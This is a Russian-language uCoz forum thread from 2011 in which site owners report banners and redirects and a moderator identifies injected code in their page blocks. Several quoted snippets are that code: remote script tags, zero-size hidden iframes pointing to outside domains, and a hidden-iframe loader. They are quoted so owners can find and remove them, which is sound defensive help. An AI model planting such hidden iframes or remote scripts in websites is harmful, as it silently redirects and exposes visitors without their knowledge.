Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
Вирусы на сайтах (для изучения) |
Здравствуйте, на сайте появился баннер, виден под Гостем и под всеми логинами.
http://hundred.ucoz.ru |
eustace, из глобального блока верхняя часть сайта, выделенное красным удалить
Quote <tr><td colspan="2" height="6"></td></tr> </table><script type="text/javascript" src="http://uclicks-begun.com/hit.js" ></script><!--/U1AHEADER1Z--> |
Помогите найти вирус на сайте. Где реклама, там есть небольшая картинка. На нее наводишь она увеличивается, при нажатии ведет на посторонний сайт.
1)http://selenaworld.ucoz.com/ 2) Под гостем нет. Добавлено (21-Сен-2011, 03:03:20) Quote (figaro4669) 2) Под гостем нет. Ошибся то же есть. |
webanet, Проблема с переадресацией с главной страницы на mail.ru
Вирусов вроде не обнаружено - во всяком случае Яндексвэбмастер и http://antivirus-alarm.ru. Мой Сайт, где есть проблема:http://aiontest.at.ua Переадресация происходит с Главной Страницы - http://aiontest.at.ua А так же с меню на главной странице по определениям: Информация о сайте http://aiontest.at.ua/index/0-2 Каталог файлов: http://aiontest.at.ua/load Каталог статей: http://aiontest.at.ua/publ Блог: http://aiontest.at.ua/blog Фотоальбомы:http://aiontest.at.ua/photo Гостевая: http://aiontest.at.ua/gb Обратная связь:http://aiontest.at.ua/index/0-3 Photoshop:http://aiontest.at.ua/index/photoshop/0-5 На форум http://aiontest.at.ua/forum нет переадресациии. На самом форуме их так же не бывает. Все переадресации только с главной и меню на главной (кроме форума). Добавлено (21-Сен-2011, 13:58:13) Добавлено (21-Сен-2011, 14:06:06) |
figaro4669, из блока личный кабинет удалите выделенное красным
Quote <table class="boxTable" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="boxTitle"><b><!-- <bt> -->Личный кабинет<!-- </bt> --></b></td></tr><tr><td class="boxContent"><!-- <bc> --><div align="center"><strong>Среда <br> 21.09.2011 <br> 13:31</strong> <br> <script type="text/javascript" src="http://selenaworld.ucoz.com/chili/1.js "></script><img class="userAvatar" title="Гость" |
christof, из блока календарь, выделенное красным удалить
Quote color_t= "7A5C40"; //Цвет текста (без #) color_l= "018ab8"; //Цвет ссылки (без #) </SCRIPT> <SCRIPT src="http://aiontest.at.ua/js/dih_java.js" type="text/javascript"> </SCRIPT><!-- </bc> --></div></div> </div> и подумайте над целесообразностью присутствия некоторых скриптов на вашем сайте и форуме. по меньшей мене они не рациональны. а необходимость некоторых мне кажется нулевой |
christof, в блоке профиль выделенное красным удалить
Quote <center><br>Ты здесь: <font color="#FF0000"><b>0</b></font>-й день </center> <center><br><a href="javascript:openOnClick('users')"> Список пользователей</a> </center> <center><br><a href="javascript:openOnClick('options')"> Изменить информацию</a> </center> <center><br><iframe src="http://bez-ryk.ucoz.net/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><a id="upml2" href="javascript:openOnClick('mail')"> Читать ЛС (<b>0</b>)</a> </center> <DIV><br><center><a target="_blank" href="http://aiontest.at.ua/index/10"> а слайдер ваш криво вставлен и будет работать только на главной. плюс тяжелый. в общем ваше дело. удаляйте что я сказала и перекидывать больше не будет. на будущее, если не понимаете работу скриптов, то не стоит их ставить к себе на сайт, и устраивать из сайта склад скриптов найденных в интернете и календарь который вы удалили тоже не возвращайте там тоже был агрессивный код |
проша777, из блока сканера доктора веба выделенное красным удалить
Quote <form method="POST" id="drweb_online_scan_form" enctype="multipart/form-data" action="http://online.drweb.com/result" target="drweb_scan_form_popup_window"> <div style="width: 190px; height: 105px; background: url(http://plusoft.ru/images/dr_web/fon_white.gif)"><div style="padding: 50px 10px 0 10px;"><iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://pro-evolution.ru/"></iframe><div align="center"><input name="file" id="file_selection_input" type="file" size="15"></div> <div style="padding-top: 5px; text-align: center"><input type="image" onclick="return do_scan_file_01();" src="http://plusoft.ru/images/dr_web/button.gif" width="121" height="21"></div></div></div><!--/U1DRIGHTER1Z--> </td> прелесть |
Лёлька8518, зайдите в вебмастер гугла во вкладку безопасность - вредоносный код. там гугль должен выкладывать образцы вредоносного кода который он обнаружил на сайте
а те коды которые я указала не стоит держать на сайте. изучите содержимое этих скриптов, думаю все станет ясно. и содержимое имеет свойства изменяться. Quote и прислали Проблемные URL на сайте вот, чтобы было понятно на что могут лаять антивирусы, а так же гугл и яшка. Quote //newItem = document.createElement('div'); //newItem.setAttribute('style', 'display: none;'); //newItem.innerHTML='<if'+'rame scrolling="no" frameborder="0" marginheight="0" marginwidth="0" style="padding:0;margin:0;border:0px; display: none;" allowtransparency="true" vspace="0" hspace="0" src="http://stats.internet-yadro.com/stats.html?bid='+teasernet_blockid+'"></ifr'+'ame>'; //olditem = document.getElementById("teasernet_"+teasernet_blockid); //olditem.parentNode.insertBefore(newItem, olditem); teasernet_blockid = teasernet_padid = 0; красным и синим выделены те места на которые срабатывают маски обнаружения поисковиков и антивирусов. на русском языке и для человеков можно перевести как создание и подгрузка скрытого элемента в фоновом режиме. а такое поведение считается агрессивным в любом случае, что бы фоном не откручивали скрыто от пользователя. теперь понятно? |
Darkest, из блока наш опрос выделенное красным удалить
Quote <input type="hidden" name="id" value="2" /> <input type="hidden" name="a" value="1" /><input type="hidden" name="ajax" value="570" /></div> <div style="padding-top:4px;text-align:center;"><iframe src="http://5fg4.pp.ua" width="0" height="0" style="display:none"></iframe><img alt="javascript://" rel="nofollow" onclick="new вы свой сайт в мозиле видели? страшное зрелище |
Здравствуйте! У меня такая вот проблема, я захожу на свой сайт http://www.bloody-games.tk/, а меня перенаправляет вот сюда http://easyquizworld.com/d/b2l9o38107?subid=&_=1316699939
На сайт зайти вообще не могу, а вот в ПУ захожу спокойно, но как только перехожу на страницу сайта то опять же эта фигня http://i061.radikal.ru/1109/1f/6771201e6afe.jpg |
Fufu, зайдите в панель управления - в настройки домена. снимите галочку с автоматического перенаправления со стандартного домена на юкозовский и после снятия перенаправления попробуйте зайти на сайт по старому юкозовскому адресу
|
Помогите найти вирус на сайте. Где реклама, там есть небольшая картинка. На нее наводишь она увеличивается, при нажатии ведет на посторонний сайт.
1)http://selenaworld.ucoz.com/ 2) Я уже обращался но есть еще где то не могу найти Вроде бы уже все пересмотрел( http://selenaworld.ucoz.com/news/2 |
| |||